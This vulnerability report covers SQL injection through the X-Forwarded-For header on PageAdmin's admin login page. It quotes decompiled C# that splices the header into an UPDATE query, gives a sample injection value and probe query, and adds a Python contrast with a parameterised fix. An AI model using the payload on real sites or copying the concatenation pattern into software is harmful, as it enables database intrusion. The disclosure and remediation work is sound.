### Brief description:
As in the title.
### Details:
Administrator login page.
The admin's login IP is obtained and recorded, but the way the IP is obtained is flawed.
X-Forwarded-For injection.
```
http://bbs.pageadmin.net/showtopic-28377.aspx
```
20140415
Local test, X-FORWARDED-FOR:8.8.8.8','20140721');
```
select * from pa_member where @@version>0 --
```
On the official site, the demo changed the login URL.
/e/master/login.aspx
```
<% @ Page Language="c#" Inherits="PageAdmin.master_login"%>
```
Looking at the SRDuaCUjVn function of PageAdmin's master_login class in ILSpy: if X-Forwarded-For is present, it is recorded. Key code:
```
text = master_login.smnQ8wkbBIPFSYwavp0(this).ServerVariables["HTTP_X_FORWARDED_FOR"];
```
No further processing is done on it afterwards.
vCBu9t9Jd6():
```
this.cx1UsTbPYR = master_login.IJfrrCknPpUqP4RXYZs(new object[]
{
"update pa_member set lastdate='",
dateTime,
"',lst_ip='",
this.C40Uh8y68l,
"',beizhu='",
this.mHfUkK4Wdy,
"',logins=logins+1 where username='",
text,
"'"
});
```
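The report shows the header value being concatenated straight into the UPDATE. As an added example (not PageAdmin's code; the table layout and the `203.0.113.7` peer address are constructed), the following contrasts that concatenation shape with a hardened version that validates X-Forwarded-For as an IP address and binds it as a query parameter:

```python
import ipaddress
import sqlite3

# Constructed stand-in for the pa_member table named in the report (not PageAdmin's schema)
SCHEMA = """
CREATE TABLE pa_member (username TEXT PRIMARY KEY, lastdate TEXT,
                        lst_ip TEXT, beizhu TEXT, logins INTEGER DEFAULT 0);
INSERT INTO pa_member VALUES ('admin', '', '', '', 0);
"""

def build_update_vulnerable(username, ip, date):
    """Same string-concatenation shape as the decompiled vCBu9t9Jd6(): the header
    value becomes part of the SQL text, so a quote inside it terminates the literal."""
    return ("update pa_member set lastdate='" + date + "',lst_ip='" + ip +
            "',logins=logins+1 where username='" + username + "'")

def client_ip(headers, remote_addr):
    """Trust X-Forwarded-For only when its first hop parses as an IP address;
    otherwise log the socket peer address rather than attacker-controlled text."""
    first = headers.get("X-Forwarded-For", "").split(",")[0].strip()
    if first:
        try:
            return str(ipaddress.ip_address(first))
        except ValueError:
            pass  # not an IP address: ignore the header entirely
    return remote_addr

def record_login_hardened(conn, username, headers, remote_addr, date):
    """Parameterised UPDATE: the IP is bound as data and cannot change the query."""
    ip = client_ip(headers, remote_addr)
    conn.execute(
        "UPDATE pa_member SET lastdate=?, lst_ip=?, logins=logins+1 WHERE username=?",
        (date, ip, username),
    )
    return conn.execute(
        "SELECT lst_ip, logins FROM pa_member WHERE username=?", (username,)
    ).fetchone()

def demo(xff_value):
    """Run one admin login against a fresh in-memory DB with the given header value."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    headers = {"X-Forwarded-For": xff_value}
    return record_login_hardened(conn, "admin", headers, "203.0.113.7", "20140721")

if __name__ == "__main__":
    print(build_update_vulnerable("admin", "8.8.8.8','20140721');", "20140721"))
    print(demo("8.8.8.8','20140721');"))  # ('203.0.113.7', 1): header rejected
    print(demo("8.8.8.8"))                 # ('8.8.8.8', 1): valid IP logged
```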
### Proof of vulnerability:
![0555.jpg](https://images.seebug.org/upload/201407/21233433fd724aa27d4a08a6e4b95a3000e67b42.jpg)
![0721.jpg](https://images.seebug.org/upload/201407/212334530c1319c9b41c00370507dc17fe7d20e8.jpg)